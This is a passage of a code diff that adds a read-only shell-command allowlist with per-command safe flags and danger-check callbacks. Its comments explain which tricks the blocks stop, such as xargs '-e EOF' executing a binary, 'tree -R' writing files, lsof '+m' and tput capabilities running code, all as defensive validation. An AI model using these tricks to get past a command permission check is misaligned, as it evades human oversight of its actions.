+ // → executes binary named EOF from PATH → CODE EXEC (malicious repo)
107
+ //
108
+ // Use uppercase `-I {}` (mandatory arg) and `-E EOF` (POSIX, mandatory
109
+ // arg) instead — both validator and xargs agree on argument consumption.
110
+ // `-i`/`-e` are deprecated (GNU: "use -I instead" / "use -E instead").
111
+ '-n': 'number',
112
+ '-P': 'number',
113
+ '-L': 'number',
114
+ '-s': 'number',
115
+ '-E': 'EOF', // POSIX, MANDATORY separate arg — validator & xargs agree
116
+ '-0': 'none',
117
+ '-t': 'none',
118
+ '-r': 'none',
119
+ '-x': 'none',
120
+ '-d': 'char',
121
+ },
122
+ },
123
+ // All git read-only commands from shared validation map
124
+ ...GIT_READ_ONLY_COMMANDS,
125
+ file: {
126
+ safeFlags: {
127
+ // Output format flags
128
+ '--brief': 'none',
129
+ '-b': 'none',
130
+ '--mime': 'none',
131
+ '-i': 'none',
132
+ '--mime-type': 'none',
133
+ '--mime-encoding': 'none',
134
+ '--apple': 'none',
135
+ // Behavior flags
136
+ '--check-encoding': 'none',
137
+ '-c': 'none',
138
+ '--exclude': 'string',
139
+ '--exclude-quiet': 'string',
140
+ '--print0': 'none',
141
+ '-0': 'none',
142
+ '-f': 'string',
143
+ '-F': 'string',
144
+ '--separator': 'string',
145
+ '--help': 'none',
146
+ '--version': 'none',
147
+ '-v': 'none',
148
+ // Following/dereferencing
149
+ '--no-dereference': 'none',
150
+ '-h': 'none',
151
+ '--dereference': 'none',
152
+ '-L': 'none',
153
+ // Magic file options (safe when just reading)
154
+ '--magic-file': 'string',
155
+ '-m': 'string',
156
+ // Other safe options
157
+ '--keep-going': 'none',
158
+ '-k': 'none',
159
+ '--list': 'none',
160
+ '-l': 'none',
161
+ '--no-buffer': 'none',
162
+ '-n': 'none',
163
+ '--preserve-date': 'none',
164
+ '-p': 'none',
165
+ '--raw': 'none',
166
+ '-r': 'none',
167
+ '-s': 'none',
168
+ '--special-files': 'none',
169
+ // Uncompress flag for archives
170
+ '--uncompress': 'none',
171
+ '-z': 'none',
172
+ },
173
+ },
174
+ sed: {
175
+ safeFlags: {
176
+ // Expression flags
177
+ '--expression': 'string',
178
+ '-e': 'string',
179
+ // Output control
180
+ '--quiet': 'none',
181
+ '--silent': 'none',
182
+ '-n': 'none',
183
+ // Extended regex
184
+ '--regexp-extended': 'none',
185
+ '-r': 'none',
186
+ '--posix': 'none',
187
+ '-E': 'none',
188
+ // Line handling
189
+ '--line-length': 'number',
190
+ '-l': 'number',
191
+ '--zero-terminated': 'none',
192
+ '-z': 'none',
193
+ '--separate': 'none',
194
+ '-s': 'none',
195
+ '--unbuffered': 'none',
196
+ '-u': 'none',
197
+ // Debugging/help
198
+ '--debug': 'none',
199
+ '--help': 'none',
200
+ '--version': 'none',
201
+ },
202
+ additionalCommandIsDangerousCallback: (rawCommand, _args) => !sedCommandIsAllowedByAllowlist(rawCommand),
203
+ },
204
+ sort: {
205
+ safeFlags: {
206
+ // Sorting options
207
+ '--ignore-leading-blanks': 'none',
208
+ '-b': 'none',
209
+ '--dictionary-order': 'none',
210
+ '-d': 'none',
211
+ '--ignore-case': 'none',
212
+ '-f': 'none',
213
+ '--general-numeric-sort': 'none',
214
+ '-g': 'none',
215
+ '--human-numeric-sort': 'none',
216
+ '-h': 'none',
217
+ '--ignore-nonprinting': 'none',
218
+ '-i': 'none',
219
+ '--month-sort': 'none',
220
+ '-M': 'none',
221
+ '--numeric-sort': 'none',
222
+ '-n': 'none',
223
+ '--random-sort': 'none',
224
+ '-R': 'none',
225
+ '--reverse': 'none',
226
+ '-r': 'none',
227
+ '--sort': 'string',
228
+ '--stable': 'none',
229
+ '-s': 'none',
230
+ '--unique': 'none',
231
+ '-u': 'none',
232
+ '--version-sort': 'none',
233
+ '-V': 'none',
234
+ '--zero-terminated': 'none',
235
+ '-z': 'none',
236
+ // Key specifications
237
+ '--key': 'string',
238
+ '-k': 'string',
239
+ '--field-separator': 'string',
240
+ '-t': 'string',
241
+ // Checking
242
+ '--check': 'none',
243
+ '-c': 'none',
244
+ '--check-char-order': 'none',
245
+ '-C': 'none',
246
+ // Merging
247
+ '--merge': 'none',
248
+ '-m': 'none',
249
+ // Buffer size
250
+ '--buffer-size': 'string',
251
+ '-S': 'string',
252
+ // Parallel processing
253
+ '--parallel': 'number',
254
+ // Batch size
255
+ '--batch-size': 'number',
256
+ // Help and version
257
+ '--help': 'none',
258
+ '--version': 'none',
259
+ },
260
+ },
261
+ man: {
262
+ safeFlags: {
263
+ // Safe display options
264
+ '-a': 'none', // Display all manual pages
265
+ '--all': 'none', // Same as -a
266
+ '-d': 'none', // Debug mode
267
+ '-f': 'none', // Emulate whatis
268
+ '--whatis': 'none', // Same as -f
269
+ '-h': 'none', // Help
270
+ '-k': 'none', // Emulate apropos
271
+ '--apropos': 'none', // Same as -k
272
+ '-l': 'string', // Local file (safe for reading, Linux only)
273
+ '-w': 'none', // Display location instead of content
274
+ // Safe formatting options
275
+ '-S': 'string', // Restrict manual sections
276
+ '-s': 'string', // Same as -S for whatis/apropos mode
277
+ },
278
+ },
279
+ // help command - only allow bash builtin help flags to prevent attacks when
280
+ // help is aliased to man (e.g., in oh-my-zsh common-aliases plugin).
281
+ // man's -P flag allows arbitrary command execution via pager.
282
+ help: {
283
+ safeFlags: {
284
+ '-d': 'none', // Output short description for each topic
285
+ '-m': 'none', // Display usage in pseudo-manpage format
286
+ '-s': 'none', // Output only a short usage synopsis
287
+ },
288
+ },
289
+ netstat: {
290
+ safeFlags: {
291
+ // Safe display options
292
+ '-a': 'none', // Show all sockets
293
+ '-L': 'none', // Show listen queue sizes
294
+ '-l': 'none', // Print full IPv6 address
295
+ '-n': 'none', // Show network addresses as numbers
296
+ // Safe filtering options
297
+ '-f': 'string', // Address family (inet, inet6, unix, vsock)
298
+ // Safe interface options
299
+ '-g': 'none', // Show multicast group membership
300
+ '-i': 'none', // Show interface state
301
+ '-I': 'string', // Specific interface
302
+ // Safe statistics options
303
+ '-s': 'none', // Show per-protocol statistics
304
+ // Safe routing options
305
+ '-r': 'none', // Show routing tables
306
+ // Safe mbuf options
307
+ '-m': 'none', // Show memory management statistics
308
+ // Safe other options
309
+ '-v': 'none', // Increase verbosity
310
+ },
311
+ },
312
+ ps: {
313
+ safeFlags: {
314
+ // UNIX-style process selection (these are safe)
315
+ '-e': 'none', // Select all processes
316
+ '-A': 'none', // Select all processes (same as -e)
317
+ '-a': 'none', // Select all with tty except session leaders
318
+ '-d': 'none', // Select all except session leaders
319
+ '-N': 'none', // Negate selection
320
+ '--deselect': 'none',
321
+ // UNIX-style output format (safe, doesn't show env)
322
+ '-f': 'none', // Full format
323
+ '-F': 'none', // Extra full format
324
+ '-l': 'none', // Long format
325
+ '-j': 'none', // Jobs format
326
+ '-y': 'none', // Don't show flags
327
+ // Output modifiers (safe ones)
328
+ '-w': 'none', // Wide output
329
+ '-ww': 'none', // Unlimited width
330
+ '--width': 'number',
331
+ '-c': 'none', // Show scheduler info
332
+ '-H': 'none', // Show process hierarchy
333
+ '--forest': 'none',
334
+ '--headers': 'none',
335
+ '--no-headers': 'none',
336
+ '-n': 'string', // Set namelist file
337
+ '--sort': 'string',
338
+ // Thread display
339
+ '-L': 'none', // Show threads
340
+ '-T': 'none', // Show threads
341
+ '-m': 'none', // Show threads after processes
342
+ // Process selection by criteria
343
+ '-C': 'string', // By command name
344
+ '-G': 'string', // By real group ID
345
+ '-g': 'string', // By session or effective group
346
+ '-p': 'string', // By PID
347
+ '--pid': 'string',
348
+ '-q': 'string', // Quick mode by PID
349
+ '--quick-pid': 'string',
350
+ '-s': 'string', // By session ID
351
+ '--sid': 'string',
352
+ '-t': 'string', // By tty
353
+ '--tty': 'string',
354
+ '-U': 'string', // By real user ID
355
+ '-u': 'string', // By effective user ID
356
+ '--user': 'string',
357
+ // Help/version
358
+ '--help': 'none',
359
+ '--info': 'none',
360
+ '-V': 'none',
361
+ '--version': 'none',
362
+ },
363
+ // Block BSD-style 'e' modifier which shows environment variables
364
+ // BSD options are letter-only tokens without a leading dash
365
+ additionalCommandIsDangerousCallback: (_rawCommand, args) => {
366
+ // Check for BSD-style 'e' in letter-only tokens (not -e which is UNIX-style)
367
+ // A BSD-style option is a token of only letters (no leading dash) containing 'e'
368
+ return args.some(a => !a.startsWith('-') && /^[a-zA-Z]*e[a-zA-Z]*$/.test(a));
369
+ },
370
+ },
371
+ base64: {
372
+ respectsDoubleDash: false, // macOS base64 does not respect POSIX --
373
+ safeFlags: {
374
+ // Safe decode options
375
+ '-d': 'none', // Decode
376
+ '-D': 'none', // Decode (macOS)
377
+ '--decode': 'none', // Decode
378
+ // Safe formatting options
379
+ '-b': 'number', // Break lines at num (macOS)
380
+ '--break': 'number', // Break lines at num (macOS)
381
+ '-w': 'number', // Wrap lines at COLS (Linux)
382
+ '--wrap': 'number', // Wrap lines at COLS (Linux)
383
+ // Safe input options (read from file, not write)
384
+ '-i': 'string', // Input file (safe for reading)
385
+ '--input': 'string', // Input file (safe for reading)
386
+ // Safe misc options
387
+ '--ignore-garbage': 'none', // Ignore non-alphabet chars when decoding (Linux)
388
+ '-h': 'none', // Help
389
+ '--help': 'none', // Help
390
+ '--version': 'none', // Version
391
+ },
392
+ },
393
+ grep: {
394
+ safeFlags: {
395
+ // Pattern flags
396
+ '-e': 'string', // Pattern
397
+ '--regexp': 'string',
398
+ '-f': 'string', // File with patterns
399
+ '--file': 'string',
400
+ '-F': 'none', // Fixed strings
401
+ '--fixed-strings': 'none',
402
+ '-G': 'none', // Basic regexp (default)
403
+ '--basic-regexp': 'none',
404
+ '-E': 'none', // Extended regexp
405
+ '--extended-regexp': 'none',
406
+ '-P': 'none', // Perl regexp
407
+ '--perl-regexp': 'none',
408
+ // Matching control
409
+ '-i': 'none', // Ignore case
410
+ '--ignore-case': 'none',
411
+ '--no-ignore-case': 'none',
412
+ '-v': 'none', // Invert match
413
+ '--invert-match': 'none',
414
+ '-w': 'none', // Word regexp
415
+ '--word-regexp': 'none',
416
+ '-x': 'none', // Line regexp
417
+ '--line-regexp': 'none',
418
+ // Output control
419
+ '-c': 'none', // Count
420
+ '--count': 'none',
421
+ '--color': 'string',
422
+ '--colour': 'string',
423
+ '-L': 'none', // Files without match
424
+ '--files-without-match': 'none',
425
+ '-l': 'none', // Files with matches
426
+ '--files-with-matches': 'none',
427
+ '-m': 'number', // Max count
428
+ '--max-count': 'number',
429
+ '-o': 'none', // Only matching
430
+ '--only-matching': 'none',
431
+ '-q': 'none', // Quiet
432
+ '--quiet': 'none',
433
+ '--silent': 'none',
434
+ '-s': 'none', // No messages
435
+ '--no-messages': 'none',
436
+ // Output line prefix
437
+ '-b': 'none', // Byte offset
438
+ '--byte-offset': 'none',
439
+ '-H': 'none', // With filename
440
+ '--with-filename': 'none',
441
+ '-h': 'none', // No filename
442
+ '--no-filename': 'none',
443
+ '--label': 'string',
444
+ '-n': 'none', // Line number
445
+ '--line-number': 'none',
446
+ '-T': 'none', // Initial tab
447
+ '--initial-tab': 'none',
448
+ '-u': 'none', // Unix byte offsets
449
+ '--unix-byte-offsets': 'none',
450
+ '-Z': 'none', // Null after filename
451
+ '--null': 'none',
452
+ '-z': 'none', // Null data
453
+ '--null-data': 'none',
454
+ // Context control
455
+ '-A': 'number', // After context
456
+ '--after-context': 'number',
457
+ '-B': 'number', // Before context
458
+ '--before-context': 'number',
459
+ '-C': 'number', // Context
460
+ '--context': 'number',
461
+ '--group-separator': 'string',
462
+ '--no-group-separator': 'none',
463
+ // File and directory selection
464
+ '-a': 'none', // Text (process binary as text)
465
+ '--text': 'none',
466
+ '--binary-files': 'string',
467
+ '-D': 'string', // Devices
468
+ '--devices': 'string',
469
+ '-d': 'string', // Directories
470
+ '--directories': 'string',
471
+ '--exclude': 'string',
472
+ '--exclude-from': 'string',
473
+ '--exclude-dir': 'string',
474
+ '--include': 'string',
475
+ '-r': 'none', // Recursive
476
+ '--recursive': 'none',
477
+ '-R': 'none', // Dereference-recursive
478
+ '--dereference-recursive': 'none',
479
+ // Other options
480
+ '--line-buffered': 'none',
481
+ '-U': 'none', // Binary
482
+ '--binary': 'none',
483
+ // Help and version
484
+ '--help': 'none',
485
+ '-V': 'none',
486
+ '--version': 'none',
487
+ },
488
+ },
489
+ ...RIPGREP_READ_ONLY_COMMANDS,
490
+ // Checksum commands - these only read files and compute/verify hashes
491
+ // All flags are safe as they only affect output format or verification behavior
492
+ sha256sum: {
493
+ safeFlags: {
494
+ // Mode flags
495
+ '-b': 'none', // Binary mode
496
+ '--binary': 'none',
497
+ '-t': 'none', // Text mode
498
+ '--text': 'none',
499
+ // Check/verify flags
500
+ '-c': 'none', // Verify checksums from file
501
+ '--check': 'none',
502
+ '--ignore-missing': 'none', // Ignore missing files during check
503
+ '--quiet': 'none', // Quiet mode during check
504
+ '--status': 'none', // Don't output, exit code shows success
505
+ '--strict': 'none', // Exit non-zero for improperly formatted lines
506
+ '-w': 'none', // Warn about improperly formatted lines
507
+ '--warn': 'none',
508
+ // Output format flags
509
+ '--tag': 'none', // BSD-style output
510
+ '-z': 'none', // End output lines with NUL
511
+ '--zero': 'none',
512
+ // Help and version
513
+ '--help': 'none',
514
+ '--version': 'none',
515
+ },
516
+ },
517
+ sha1sum: {
518
+ safeFlags: {
519
+ // Mode flags
520
+ '-b': 'none', // Binary mode
521
+ '--binary': 'none',
522
+ '-t': 'none', // Text mode
523
+ '--text': 'none',
524
+ // Check/verify flags
525
+ '-c': 'none', // Verify checksums from file
526
+ '--check': 'none',
527
+ '--ignore-missing': 'none', // Ignore missing files during check
528
+ '--quiet': 'none', // Quiet mode during check
529
+ '--status': 'none', // Don't output, exit code shows success
530
+ '--strict': 'none', // Exit non-zero for improperly formatted lines
531
+ '-w': 'none', // Warn about improperly formatted lines
532
+ '--warn': 'none',
533
+ // Output format flags
534
+ '--tag': 'none', // BSD-style output
535
+ '-z': 'none', // End output lines with NUL
536
+ '--zero': 'none',
537
+ // Help and version
538
+ '--help': 'none',
539
+ '--version': 'none',
540
+ },
541
+ },
542
+ md5sum: {
543
+ safeFlags: {
544
+ // Mode flags
545
+ '-b': 'none', // Binary mode
546
+ '--binary': 'none',
547
+ '-t': 'none', // Text mode
548
+ '--text': 'none',
549
+ // Check/verify flags
550
+ '-c': 'none', // Verify checksums from file
551
+ '--check': 'none',
552
+ '--ignore-missing': 'none', // Ignore missing files during check
553
+ '--quiet': 'none', // Quiet mode during check
554
+ '--status': 'none', // Don't output, exit code shows success
555
+ '--strict': 'none', // Exit non-zero for improperly formatted lines
556
+ '-w': 'none', // Warn about improperly formatted lines
557
+ '--warn': 'none',
558
+ // Output format flags
559
+ '--tag': 'none', // BSD-style output
560
+ '-z': 'none', // End output lines with NUL
561
+ '--zero': 'none',
562
+ // Help and version
563
+ '--help': 'none',
564
+ '--version': 'none',
565
+ },
566
+ },
567
+ // tree command - moved from READONLY_COMMAND_REGEXES to allow flags and path arguments
568
+ // -o/--output writes to a file, so it's excluded. All other flags are display/filter options.
569
+ tree: {
570
+ safeFlags: {
571
+ // Listing options
572
+ '-a': 'none', // All files
573
+ '-d': 'none', // Directories only
574
+ '-l': 'none', // Follow symlinks
575
+ '-f': 'none', // Full path prefix
576
+ '-x': 'none', // Stay on current filesystem
577
+ '-L': 'number', // Max depth
578
+ // SECURITY: -R REMOVED. tree -R combined with -H (HTML mode) and -L (depth)
579
+ // WRITES 00Tree.html files to every subdirectory at the depth boundary.
580
+ // From man tree (< 2.1.0): "-R — at each of them execute tree again
581
+ // adding `-o 00Tree.html` as a new option." The comment "Rerun at max
582
+ // depth" was misleading — the "rerun" includes a hardcoded -o file write.
583
+ // `tree -R -H . -L 2 /path` → writes /path/<subdir>/00Tree.html for each
584
+ // subdir at depth 2. FILE WRITE, zero permissions.
585
+ '-P': 'string', // Include pattern
586
+ '-I': 'string', // Exclude pattern
587
+ '--gitignore': 'none',
588
+ '--gitfile': 'string',
589
+ '--ignore-case': 'none',
590
+ '--matchdirs': 'none',
591
+ '--metafirst': 'none',
592
+ '--prune': 'none',
593
+ '--info': 'none',
594
+ '--infofile': 'string',
595
+ '--noreport': 'none',
596
+ '--charset': 'string',
597
+ '--filelimit': 'number',
598
+ // File display options
599
+ '-q': 'none', // Non-printable as ?
600
+ '-N': 'none', // Non-printable as-is
601
+ '-Q': 'none', // Quote filenames
602
+ '-p': 'none', // Protections
603
+ '-u': 'none', // Owner
604
+ '-g': 'none', // Group
605
+ '-s': 'none', // Size bytes
606
+ '-h': 'none', // Human-readable sizes
607
+ '--si': 'none',
608
+ '--du': 'none',
609
+ '-D': 'none', // Last modification time
610
+ '--timefmt': 'string',
611
+ '-F': 'none', // Append indicator
612
+ '--inodes': 'none',
613
+ '--device': 'none',
614
+ // Sorting options
615
+ '-v': 'none', // Version sort
616
+ '-t': 'none', // Sort by mtime
617
+ '-c': 'none', // Sort by ctime
618
+ '-U': 'none', // Unsorted
619
+ '-r': 'none', // Reverse sort
620
+ '--dirsfirst': 'none',
621
+ '--filesfirst': 'none',
622
+ '--sort': 'string',
623
+ // Graphics/output options
624
+ '-i': 'none', // No indentation lines
625
+ '-A': 'none', // ANSI line graphics
626
+ '-S': 'none', // CP437 line graphics
627
+ '-n': 'none', // No color
628
+ '-C': 'none', // Color
629
+ '-X': 'none', // XML output
630
+ '-J': 'none', // JSON output
631
+ '-H': 'string', // HTML output with base HREF
632
+ '--nolinks': 'none',
633
+ '--hintro': 'string',
634
+ '--houtro': 'string',
635
+ '-T': 'string', // HTML title
636
+ '--hyperlink': 'none',
637
+ '--scheme': 'string',
638
+ '--authority': 'string',
639
+ // Input options (read from file, not write)
640
+ '--fromfile': 'none',
641
+ '--fromtabfile': 'none',
642
+ '--fflinks': 'none',
643
+ // Help and version
644
+ '--help': 'none',
645
+ '--version': 'none',
646
+ },
647
+ },
648
+ // date command - moved from READONLY_COMMANDS because -s/--set can set system time
649
+ // Also -f/--file can be used to read dates from file and set time
650
+ // We only allow safe display options
651
+ date: {
652
+ safeFlags: {
653
+ // Display options (safe - don't modify system time)
654
+ '-d': 'string', // --date=STRING - display time described by STRING
655
+ '--date': 'string',
656
+ '-r': 'string', // --reference=FILE - display file's modification time
657
+ '--reference': 'string',
658
+ '-u': 'none', // --utc - use UTC
659
+ '--utc': 'none',
660
+ '--universal': 'none',
661
+ // Output format options
662
+ '-I': 'none', // --iso-8601 (can have optional argument, but none type handles bare flag)
663
+ '--iso-8601': 'string',
664
+ '-R': 'none', // --rfc-email
665
+ '--rfc-email': 'none',
666
+ '--rfc-3339': 'string',
667
+ // Debug/help
668
+ '--debug': 'none',
669
+ '--help': 'none',
670
+ '--version': 'none',
671
+ },
672
+ // Dangerous flags NOT included (blocked by omission):
673
+ // -s / --set - sets system time
674
+ // -f / --file - reads dates from file (can be used to set time in batch)
675
+ // CRITICAL: date positional args in format MMDDhhmm[[CC]YY][.ss] set system time
676
+ // Use callback to verify positional args start with + (format strings like +"%Y-%m-%d")
677
+ additionalCommandIsDangerousCallback: (_rawCommand, args) => {
678
+ // args are already parsed tokens after "date"
679
+ // Flags that require an argument
680
+ const flagsWithArgs = new Set([
681
+ '-d',
682
+ '--date',
683
+ '-r',
684
+ '--reference',
685
+ '--iso-8601',
686
+ '--rfc-3339',
687
+ ]);
688
+ let i = 0;
689
+ while (i < args.length) {
690
+ const token = args[i];
691
+ // Skip flags and their arguments
692
+ if (token.startsWith('--') && token.includes('=')) {
693
+ // Long flag with =value, already consumed
694
+ i++;
695
+ }
696
+ else if (token.startsWith('-')) {
697
+ // Flag - check if it takes an argument
698
+ if (flagsWithArgs.has(token)) {
699
+ i += 2; // Skip flag and its argument
700
+ }
701
+ else {
702
+ i++; // Just skip the flag
703
+ }
704
+ }
705
+ else {
706
+ // Positional argument - must start with + for format strings
707
+ // Anything else (like MMDDhhmm) could set system time
708
+ if (!token.startsWith('+')) {
709
+ return true; // Dangerous
710
+ }
711
+ i++;
712
+ }
713
+ }
714
+ return false; // Safe
715
+ },
716
+ },
717
+ // hostname command - moved from READONLY_COMMANDS because positional args set hostname
718
+ // Also -F/--file sets hostname from file, -b/--boot sets default hostname
719
+ // We only allow safe display options and BLOCK any positional arguments
720
+ hostname: {
721
+ safeFlags: {
722
+ // Display options only (safe)
723
+ '-f': 'none', // --fqdn - display FQDN
724
+ '--fqdn': 'none',
725
+ '--long': 'none',
726
+ '-s': 'none', // --short - display short name
727
+ '--short': 'none',
728
+ '-i': 'none', // --ip-address
729
+ '--ip-address': 'none',
730
+ '-I': 'none', // --all-ip-addresses
731
+ '--all-ip-addresses': 'none',
732
+ '-a': 'none', // --alias
733
+ '--alias': 'none',
734
+ '-d': 'none', // --domain
735
+ '--domain': 'none',
736
+ '-A': 'none', // --all-fqdns
737
+ '--all-fqdns': 'none',
738
+ '-v': 'none', // --verbose
739
+ '--verbose': 'none',
740
+ '-h': 'none', // --help
741
+ '--help': 'none',
742
+ '-V': 'none', // --version
743
+ '--version': 'none',
744
+ },
745
+ // CRITICAL: Block any positional arguments - they set the hostname
746
+ // Also block -F/--file, -b/--boot, -y/--yp/--nis (not in safeFlags = blocked)
747
+ // Use regex to ensure no positional args after flags
748
+ regex: /^hostname(?:\s+(?:-[a-zA-Z]|--[a-zA-Z-]+))*\s*$/,
749
+ },
750
+ // info command - moved from READONLY_COMMANDS because -o/--output writes to files
751
+ // Also --dribble writes keystrokes to file, --init-file loads custom config
752
+ // We only allow safe display/navigation options
753
+ info: {
754
+ safeFlags: {
755
+ // Navigation/display options (safe)
756
+ '-f': 'string', // --file - specify manual file to read
757
+ '--file': 'string',
758
+ '-d': 'string', // --directory - search path
759
+ '--directory': 'string',
760
+ '-n': 'string', // --node - specify node
761
+ '--node': 'string',
762
+ '-a': 'none', // --all
763
+ '--all': 'none',
764
+ '-k': 'string', // --apropos - search
765
+ '--apropos': 'string',
766
+ '-w': 'none', // --where - show location
767
+ '--where': 'none',
768
+ '--location': 'none',
769
+ '--show-options': 'none',
770
+ '--vi-keys': 'none',
771
+ '--subnodes': 'none',
772
+ '-h': 'none',
773
+ '--help': 'none',
774
+ '--usage': 'none',
775
+ '--version': 'none',
776
+ },
777
+ // Dangerous flags NOT included (blocked by omission):
778
+ // -o / --output - writes output to file
779
+ // --dribble - records keystrokes to file
780
+ // --init-file - loads custom config (potential code execution)
781
+ // --restore - replays keystrokes from file
782
+ },
783
+ lsof: {
784
+ safeFlags: {
785
+ '-?': 'none',
786
+ '-h': 'none',
787
+ '-v': 'none',
788
+ '-a': 'none',
789
+ '-b': 'none',
790
+ '-C': 'none',
791
+ '-l': 'none',
792
+ '-n': 'none',
793
+ '-N': 'none',
794
+ '-O': 'none',
795
+ '-P': 'none',
796
+ '-Q': 'none',
797
+ '-R': 'none',
798
+ '-t': 'none',
799
+ '-U': 'none',
800
+ '-V': 'none',
801
+ '-X': 'none',
802
+ '-H': 'none',
803
+ '-E': 'none',
804
+ '-F': 'none',
805
+ '-g': 'none',
806
+ '-i': 'none',
807
+ '-K': 'none',
808
+ '-L': 'none',
809
+ '-o': 'none',
810
+ '-r': 'none',
811
+ '-s': 'none',
812
+ '-S': 'none',
813
+ '-T': 'none',
814
+ '-x': 'none',
815
+ '-A': 'string',
816
+ '-c': 'string',
817
+ '-d': 'string',
818
+ '-e': 'string',
819
+ '-k': 'string',
820
+ '-p': 'string',
821
+ '-u': 'string',
822
+ // OMITTED (writes to disk): -D (device cache file build/update)
823
+ },
824
+ // Block +m (create mount supplement file) — writes to disk.
825
+ // +prefix flags are treated as positional args by validateFlags,
826
+ // so we must catch them here. lsof accepts +m<path> (attached path, no space)
827
+ // with both absolute (+m/tmp/evil) and relative (+mfoo, +m.evil) paths.
828
+ additionalCommandIsDangerousCallback: (_rawCommand, args) => args.some(a => a === '+m' || a.startsWith('+m')),
829
+ },
830
+ pgrep: {
831
+ safeFlags: {
832
+ '-d': 'string',
833
+ '--delimiter': 'string',
834
+ '-l': 'none',
835
+ '--list-name': 'none',
836
+ '-a': 'none',
837
+ '--list-full': 'none',
838
+ '-v': 'none',
839
+ '--inverse': 'none',
840
+ '-w': 'none',
841
+ '--lightweight': 'none',
842
+ '-c': 'none',
843
+ '--count': 'none',
844
+ '-f': 'none',
845
+ '--full': 'none',
846
+ '-g': 'string',
847
+ '--pgroup': 'string',
848
+ '-G': 'string',
849
+ '--group': 'string',
850
+ '-i': 'none',
851
+ '--ignore-case': 'none',
852
+ '-n': 'none',
853
+ '--newest': 'none',
854
+ '-o': 'none',
855
+ '--oldest': 'none',
856
+ '-O': 'string',
857
+ '--older': 'string',
858
+ '-P': 'string',
859
+ '--parent': 'string',
860
+ '-s': 'string',
861
+ '--session': 'string',
862
+ '-t': 'string',
863
+ '--terminal': 'string',
864
+ '-u': 'string',
865
+ '--euid': 'string',
866
+ '-U': 'string',
867
+ '--uid': 'string',
868
+ '-x': 'none',
869
+ '--exact': 'none',
870
+ '-F': 'string',
871
+ '--pidfile': 'string',
872
+ '-L': 'none',
873
+ '--logpidfile': 'none',
874
+ '-r': 'string',
875
+ '--runstates': 'string',
876
+ '--ns': 'string',
877
+ '--nslist': 'string',
878
+ '--help': 'none',
879
+ '-V': 'none',
880
+ '--version': 'none',
881
+ },
882
+ },
883
+ tput: {
884
+ safeFlags: {
885
+ '-T': 'string',
886
+ '-V': 'none',
887
+ '-x': 'none',
888
+ // SECURITY: -S (read capability names from stdin) deliberately EXCLUDED.
889
+ // It must NOT be in safeFlags because validateFlags unbundles combined
890
+ // short flags (e.g., -xS → -x + -S), but the callback receives the raw
891
+ // token '-xS' and only checks exact match 'token === "-S"'. Excluding -S
892
+ // from safeFlags ensures validateFlags rejects it (bundled or not) before
893
+ // the callback runs. The callback's -S check is defense-in-depth.
894
+ },
895
+ additionalCommandIsDangerousCallback: (_rawCommand, args) => {
896
+ // Capabilities that modify terminal state or could be harmful.
897
+ // init/reset run iprog (arbitrary code from terminfo) and modify tty settings.
898
+ // rs1/rs2/rs3/is1/is2/is3 are the individual reset/init sequences that
899
+ // init/reset invoke internally — rs1 sends ESC c (full terminal reset).
900
+ // clear erases scrollback (evidence destruction). mc5/mc5p activate media copy
901
+ // (redirect output to printer device). smcup/rmcup manipulate screen buffer.
902
+ // pfkey/pfloc/pfx/pfxl program function keys — pfloc executes strings locally.
903
+ // rf is reset file (analogous to if/init_file).
904
+ const DANGEROUS_CAPABILITIES = new Set([
905
+ 'init',
906
+ 'reset',
907
+ 'rs1',
908
+ 'rs2',
909
+ 'rs3',
910
+ 'is1',
911
+ 'is2',
912
+ 'is3',
913
+ 'iprog',
914
+ 'if',
915
+ 'rf',
916
+ 'clear',
917
+ 'flash',
918
+ 'mc0',
919
+ 'mc4',
920
+ 'mc5',
921
+ 'mc5i',
922
+ 'mc5p',
923
+ 'pfkey',
924
+ 'pfloc',
925
+ 'pfx',
926
+ 'pfxl',
927
+ 'smcup',
928
+ 'rmcup',
929
+ ]);
930
+ const flagsWithArgs = new Set(['-T']);
931
+ let i = 0;
932
+ let afterDoubleDash = false;
933
+ while (i < args.length) {
934
+ const token = args[i];
935
+ if (token === '--') {
936
+ afterDoubleDash = true;
937
+ i++;
938
+ }
939
+ else if (!afterDoubleDash && token.startsWith('-')) {
940
+ // Defense-in-depth: block -S even if it somehow passes validateFlags
941
+ if (token === '-S')
942
+ return true;
943
+ // Also check for -S bundled with other flags (e.g., -xS)
944
+ if (!token.startsWith('--') &&
945
+ token.length > 2 &&
946
+ token.includes('S'))
947
+ return true;
948
+ if (flagsWithArgs.has(token)) {
949
+ i += 2;
950
+ }
951
+ else {
952
+ i++;
953
+ }
954
+ }
955
+ else {
956
+ if (DANGEROUS_CAPABILITIES.has(token))
957
+ return true;
958
+ i++;
959
+ }
960
+ }
961
+ return false;
962
+ },
963
+ },
964
+ // ss — socket statistics (iproute2). Read-only query tool equivalent to netstat.
965
+ // SECURITY: -K/--kill (forcibly close sockets) and -D/--diag (dump raw data to file)
966
+ // are deliberately excluded. -F/--filter (read filter from file) also excluded.
967
+ ss: {
968
+ safeFlags: {
969
+ '-h': 'none',
970
+ '--help': 'none',
971
+ '-V': 'none',
972
+ '--version': 'none',
973
+ '-n': 'none',
974
+ '--numeric': 'none',
975
+ '-r': 'none',
976
+ '--resolve': 'none',
977
+ '-a': 'none',
978
+ '--all': 'none',
979
+ '-l': 'none',
980
+ '--listening': 'none',
981
+ '-o': 'none',
982
+ '--options': 'none',
983
+ '-e': 'none',
984
+ '--extended': 'none',
985
+ '-m': 'none',
986
+ '--memory': 'none',
987
+ '-p': 'none',
988
+ '--processes': 'none',
989
+ '-i': 'none',
990
+ '--info': 'none',
991
+ '-s': 'none',
992
+ '--summary': 'none',
993
+ '-4': 'none',
994
+ '--ipv4': 'none',
995
+ '-6': 'none',
996
+ '--ipv6': 'none',
997
+ '-0': 'none',
998
+ '--packet': 'none',
999
+ '-t': 'none',
1000
+ '--tcp': 'none',
1001
+ '-M': 'none',
1002
+ '--mptcp': 'none',
1003
+ '-S': 'none',
1004
+ '--sctp': 'none',
1005
+ '-u': 'none',
1006
+ '--udp': 'none',
1007
+ '-d': 'none',
1008
+ '--dccp': 'none',
1009
+ '-w': 'none',
1010
+ '--raw': 'none',
1011
+ '-x': 'none',
1012
+ '--unix': 'none',
1013
+ '--tipc': 'none',
1014
+ '--vsock': 'none',
1015
+ '-f': 'string',
1016
+ '--family': 'string',
1017
+ '-A': 'string',
1018
+ '--query': 'string',
1019
+ '--socket': 'string',
1020
+ '-Z': 'none',
1021
+ '--context': 'none',
1022
+ '-z': 'none',
1023
+ '--contexts': 'none',
1024
+ // SECURITY: -N/--net EXCLUDED — performs setns(), unshare(), mount(), umount()
1025
+ // to switch network namespace. While isolated to forked process, too invasive.
1026
